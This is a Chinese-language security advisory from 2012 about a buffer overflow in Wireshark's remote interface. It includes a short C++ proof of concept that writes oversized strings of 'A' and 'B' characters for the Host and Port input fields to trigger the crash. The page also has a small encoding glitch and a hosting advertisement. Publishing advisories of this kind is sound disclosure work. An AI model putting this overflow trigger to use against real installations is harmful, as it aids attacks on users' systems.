Wireshark遠(yuǎn)程界面緩沖區(qū)溢出漏洞

發(fā)布日期：2012-08-28
更新日期：2012-08-29

受影響系統(tǒng)：
Wireshark Wireshark 1.6.x
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 55211

-
 

Wireshark（前稱Ethereal）是一個(gè)網(wǎng)絡(luò)分組分析軟件。

Wireshark 1.6.0、1.8.2及其他版本在實(shí)現(xiàn)上存在緩沖區(qū)溢出漏洞，可允許遠(yuǎn)程攻擊者在受影響應(yīng)用中執(zhí)行任意代碼。

<*來源：X-h4ck
  *>

測(cè)試方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能帶有攻擊性，僅供安全研究與教學(xué)之用。使用者風(fēng)險(xiǎn)自負(fù)！

X-h4ck （）提供了如下測(cè)試方法：

#include <cstdio>
#include <iostream>
// wrote a little shit code to generate > nicely for u those strings
using namespace std;
int main(){

  char buff1[] = "\x41";
  char buff2[] = "\x42";
  FILE *txtfile;
  txtfile = fopen("c:\\exploit.txt", "w");
  fputs("Host Input:\n",txtfile);
  for(int i=0; i < 659; i++){
    fputs(buff1,txtfile);
    }
  fputs("\n",txtfile);
  fputs("Port Input:\n",txtfile);
  for (int y=0; y < 652; y++) {
    fputs(buff1,txtfile);
    }
  for(int x=0; x < 8; x++) {
    fputs(buff2,txtfile);
    }
  fclose(txtfile);
  return 0;
}

建議：
--------------------------------------------------------------------------------
廠商補(bǔ)�。�

Wireshark
---------
目前廠商還沒有提供補(bǔ)丁或者升級(jí)程序，我們建議使用此軟件的用戶隨時(shí)關(guān)注廠商的主頁以獲取最新版本：

服務(wù)器租用/服務(wù)器托管中國(guó)五強(qiáng)！虛擬主機(jī)域名注冊(cè)頂級(jí)提供商！15年品質(zhì)保障！--億恩科技[ENKJ.COM]